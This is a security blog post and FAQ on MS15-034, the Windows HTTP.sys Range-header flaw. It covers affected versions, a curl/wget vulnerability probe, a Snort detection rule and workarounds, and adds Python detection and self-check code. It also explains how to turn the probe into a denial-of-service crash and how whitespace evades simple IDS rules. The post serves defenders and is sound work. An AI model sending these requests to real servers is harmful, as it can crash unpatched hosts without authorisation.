  • Leon Teale

MS15-034: Vulnerability in HTTP.sys Could Allow Remote Code Execution



Description

The version of Windows running on the remote host is affected by a vulnerability in the HTTP protocol stack (HTTP.sys) caused by improper parsing of crafted HTTP requests. A remote attacker can exploit this to execute arbitrary code with System privileges.

Solution

Microsoft has released a set of patches for Windows 7, 2008 R2, 8, 8.1, 2012, and 2012 R2.

See Also

https://technet.microsoft.com/en-us/library/security/MS15-034


This Microsoft vulnerability, MS15-034, affects Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012, Windows 8.1, and Windows Server 2012 R2 running HTTP.sys, which is used by any version of IIS on one of these operating systems. HTTP.sys was introduced with IIS 6.


This vulnerability is in the HTTP protocol stack (HTTP.sys) and is caused by improper parsing of crafted HTTP requests. A remote attacker can exploit this to execute arbitrary code with System privileges; alternatively, and most frequently seen in practice, the same improper parsing can be triggered to cause a Denial of Service (DoS).



For example, public exploit code exists to test for the vulnerability, and a simple curl request can also provide the same information:


curl -v 254.254.254.254/ -H "Host: test" -H "Range: bytes=0-18446744073709551615"

In the example Proof of Concept (PoC) above, changing the "0-" to "20-" (the lower bound has to be smaller than the size of the retrieved file, but larger than 0) will trigger a DoS, effectively shutting down the target host.


Microsoft has released information about this vulnerability: https://technet.microsoft.com/en-us/library/security/MS15-034


Some research shows that an IPS may protect you if you have the right rules installed. For example, here is a simple rule for Snort:

alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg: " MS15-034 Range Header HTTP.sys Exploit"; content: "|0d 0a|Range: bytes="; nocase; content: "-"; within: 20 ; byte_test: 10,>,1000000000,0,relative,string,dec ; sid: 1001239;)

(byte_test is limited to 10 bytes, so I just check whether the first 10 bytes are larger than 1000000000)

However, there are some tricks to bypass simple rules, like adding whitespace to the Range: header's value.


Simple IIS filtering will not protect against this, as IIS request filtering happens after the Range header is parsed.


Manual Checking

root@kali:~/Desktop/Tools/ms15-034# gcc 36773.c
root@kali:~/Desktop/Tools/ms15-034# ls
36773.c  a.out
root@kali:~/Desktop/Tools/ms15-034# file a.out
a.out: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, BuildID[sha1]=0xe84f917d3d5c67e5332ecb7b49a8a9614e5df588, not stripped
root@kali:~/Desktop/Tools/ms15-034# ./a.out
Usage: ./a.out <ip of server>
root@kali:~/Desktop/Tools/ms15-034# ./a.out 254.254.254.254
[*] Audit Started
[!!] Looks VULN

FAQ

1 - Which Versions of Windows Are Vulnerable?

Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012, Windows 8.1, and Windows Server 2012 R2. HTTP.sys is used by any version of IIS running on one of these operating systems. HTTP.sys was introduced with IIS 6.


2 - Will an IPS protect me?

Yes, if you have the right rules installed. For example, here is a simple rule for Snort:


alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg: " MS15-034 Range Header HTTP.sys Exploit"; content: "|0d 0a|Range: bytes="; nocase; content: "-"; within: 20 ; byte_test: 10,>,1000000000,0,relative,string,dec ; sid: 1001239;)

(byte_test is limited to 10 bytes, so I just check whether the first 10 bytes are larger than 1000000000)


Watch out: there are some tricks to bypass simple rules, like adding whitespace to the Range: header's value.
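A host-side equivalent of the Snort rule above (and of the same rule in the body of the post), as an added Python example that is not part of the original post: it parses the Range header out of raw HTTP request heads and flags MS15-034-style values, while tolerating the whitespace inserted into the header value that the post names as a bypass of simple signatures. The sample requests are constructed for this example; the threshold mirrors the rule's 1000000000, and the top-level names (SAMPLE_REQUESTS, parse_range_header, is_suspicious_range, scan) are this example's own.

```python
import re

# Constructed sample request heads (not from the original post), as they might
# appear in a packet capture or a reverse-proxy log.
SAMPLE_REQUESTS = {
    "normal": (
        b"GET /video.mp4 HTTP/1.1\r\n"
        b"Host: www.example.com\r\n"
        b"Range: bytes=0-1023\r\n\r\n"
    ),
    "poc": (
        b"GET / HTTP/1.1\r\n"
        b"Host: test\r\n"
        b"Range: bytes=0-18446744073709551615\r\n\r\n"
    ),
    # Same request with whitespace inside the header value: a signature that
    # expects "bytes=" immediately followed by digits misses this variant.
    "poc_whitespace": (
        b"GET / HTTP/1.1\r\n"
        b"Host: test\r\n"
        b"Range:  bytes = 0 - 18446744073709551615\r\n\r\n"
    ),
}

# Threshold taken from the Snort rule on the page; 2**64 - 1 is the value the
# public PoC request uses.
THRESHOLD = 1_000_000_000
UINT64_MAX = 2**64 - 1

# Tolerant header pattern: optional whitespace around the colon, "bytes", "="
# and "-". MULTILINE makes ^ and $ work per header line; $ sits before the \n
# after \s* has consumed the \r.
_RANGE_RE = re.compile(
    rb"^Range\s*:\s*bytes\s*=\s*(\d*)\s*-\s*(\d*)\s*$",
    re.IGNORECASE | re.MULTILINE,
)


def parse_range_header(request: bytes):
    """Return (first, last) for the first 'Range: bytes=first-last' header in a
    raw request head (None for an absent bound), or None if there is no
    byte-range header at all."""
    m = _RANGE_RE.search(request)
    if not m:
        return None
    first = int(m.group(1)) if m.group(1) else None
    last = int(m.group(2)) if m.group(2) else None
    return first, last


def is_suspicious_range(request: bytes) -> bool:
    """True when either bound of the Range header exceeds THRESHOLD, which is
    the MS15-034 request pattern the page describes."""
    parsed = parse_range_header(request)
    if parsed is None:
        return False
    return any(v is not None and v > THRESHOLD for v in parsed)


def scan(requests: dict) -> list:
    """Return the names of the requests that match, in input order."""
    return [name for name, raw in requests.items() if is_suspicious_range(raw)]


if __name__ == "__main__":
    for name in scan(SAMPLE_REQUESTS):
        print(f"[!] {name}: MS15-034-style Range header")
```

The whitespace-tolerant pattern is the point: the Snort rule anchors on the literal `Range: bytes=` followed by the digits, so the third sample slips past it while this parser still recovers the same 2^64-1 upper bound. A bare `bytes=0-` (no upper bound) parses to `(0, None)` and is not flagged.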


3 - Will the exploit work over SSL?

Yes, which may allow it to bypass your IDS or other network protections.


4 - Have you seen active exploits "in the wild"?

Not yet. We have seen working DoS exploits, but have not detected them in our honeypots. Erratasec conducted a (partial) scan of the Internet using a non-DoS exploit with the intent to enumerate vulnerable systems.


5 - How do I know if I am vulnerable?

Send the following request to your IIS server:

GET / HTTP/1.1
Host: MS15034
Range: bytes=0-18446744073709551615

If the server responds with "Requested Header Range Not Satisfiable", then you may be vulnerable.

Test Scripts:

(powershell removed as it doesn't support 64 bit integers... worked without error for me, but something else may have been wrong with it)

curl -v [ipaddress]/ -H "Host: test" -H "Range: bytes=0-18446744073709551615"
wget -O /dev/null --header="Range: bytes=0-18446744073709551615" http://ip
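The same check as the curl and wget one-liners above, wrapped into a Python self-check for your own IIS hosts (an added example, not part of the original post or of any tool it mentions): it sends only the non-DoS form of the probe, with lower bound 0, and interprets the status line the way the post describes, treating a 416 / "Range Not Satisfiable" reply as the "may be vulnerable" indicator and reporting anything else as not indicated. TARGET_HOST is a placeholder, and the function names are this example's own.

```python
import re
import socket

# Placeholder for one of your own IIS hosts; replace before running.
TARGET_HOST = "iis.example.internal"
TARGET_PORT = 80

UINT64_MAX = 2**64 - 1  # the 18446744073709551615 in the post's request


def build_probe(host_header: str = "MS15034") -> bytes:
    """Build the non-DoS probe from the post: lower bound 0, upper bound
    2**64-1. The post states that only a non-zero lower bound (e.g. 20-)
    triggers the crash, so this form is the one to use against live hosts."""
    return (
        "GET / HTTP/1.1\r\n"
        f"Host: {host_header}\r\n"
        f"Range: bytes=0-{UINT64_MAX}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode("ascii")


# Status line: "HTTP/1.x <code> <reason>"
_STATUS_RE = re.compile(rb"^HTTP/1\.[01] (\d{3}) ?([^\r\n]*)")


def classify_response(raw: bytes) -> str:
    """Interpret a raw HTTP response head. Only the 416 condition comes from
    the post; every other status is reported as 'not indicated'."""
    m = _STATUS_RE.match(raw)
    if not m:
        return "unparseable response"
    code = int(m.group(1))
    reason = m.group(2).decode("ascii", errors="replace")
    if code == 416 or "range not satisfiable" in reason.lower():
        return "may be vulnerable"
    return f"not indicated (HTTP {code} {reason})"


def probe(host: str, port: int = 80, timeout: float = 5.0) -> str:
    """Send the probe over a plain TCP socket and classify the reply head."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_probe())
        head = b""
        # Read until the status line is complete (or a sane upper bound).
        while b"\r\n" not in head and len(head) < 4096:
            chunk = sock.recv(1024)
            if not chunk:
                break
            head += chunk
    return classify_response(head)


if __name__ == "__main__":
    print(f"{TARGET_HOST}:{TARGET_PORT} -> {probe(TARGET_HOST, TARGET_PORT)}")
```

Because the post's own wording is "you may be vulnerable", the classifier deliberately reports nothing stronger than that, and it does not try to interpret other status codes as proof of patching; confirm patch state from the host itself (the KB referenced in the links at the end of the post).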

6 - Can this vulnerability be exploited to do more than a DoS?

In its advisory, Microsoft classifies the vulnerability as remote code execution. At this point, however, no public exploit executes code; only DoS exploits are available.


There also appears to be an information disclosure vulnerability. If the lower end of the range is one byte less than the size of the retrieved file, kernel memory is appended to the output before the system reboots. In my own testing, I was not able to achieve consistent information leakage. Most of the time, the server just crashes.


[Turns out, the file does not have to be > 4GB. Tried it with a short file and it worked. The >4GB information came from a bad interpretation of mine of the Chinese article in the "Resources" section]


7 - How do I launch the DoS exploit?

In the example PoC above, change the "0-" to "20-" (the lower bound has to be smaller than the size of the retrieved file, but larger than 0).


8 - What is special about the large number in the PoC exploit?

It is 2^64-1, the largest unsigned 64-bit number (hex: 0xFFFFFFFFFFFFFFFF).


9 - Any Other Workarounds?

In IIS 7, you can disable kernel caching.
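The IIS 7 workaround above expressed as a configuration fragment, added here as an example and not taken from the original post: the enableKernelCache attribute of the system.webServer/caching section controls kernel-mode output caching, and setting it to false in a site's web.config (or centrally in applicationHost.config) turns it off for that site, which is what unticking "Enable kernel cache" in the IIS Manager Output Caching feature settings does. Note that this covers IIS only; other HTTP.sys consumers listed by netsh http show servicestate (question 10) are not affected by this setting.

```xml
<?xml version="1.0" encoding="utf-8"?>
<!-- Example web.config fragment (not from the original post).
     The weak setting is the default, kernel caching enabled: -->
<!--
<configuration>
  <system.webServer>
    <caching enabled="true" enableKernelCache="true" />
  </system.webServer>
</configuration>
-->
<!-- Workaround from the post: keep user-mode output caching, disable the
     kernel-mode (HTTP.sys) cache for this site. -->
<configuration>
  <system.webServer>
    <caching enabled="true" enableKernelCache="false" />
  </system.webServer>
</configuration>
```

Disabling the kernel cache costs performance on cache-heavy static sites, so treat it as a stopgap until the patch from the Microsoft bulletin is applied, then revert it.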


10 - Is only IIS vulnerable? Or are other components affected as well?

Potentially, anything using HTTP.sys and kernel caching is vulnerable. HTTP.sys is the Windows library used to parse HTTP requests. However, IIS is the most common program exposing HTTP.sys. You may find potentially vulnerable components by typing: netsh http show servicestate (thx to @Gmanfunky)


11 - Will IIS Request Filtering Protect Me?

No. IIS Request Filtering happens after the Range header is parsed.

References:

https://ma.ttias.be/remote-code-execution-via-http-request-in-iis-on-windows/

https://technet.microsoft.com/library/security/MS15-034

https://support.microsoft.com/en-us/kb/3042553

http://blogs.360.cn/blog/cve_2015_6135_http_rce_analysis


© 2018 by Leon Teale
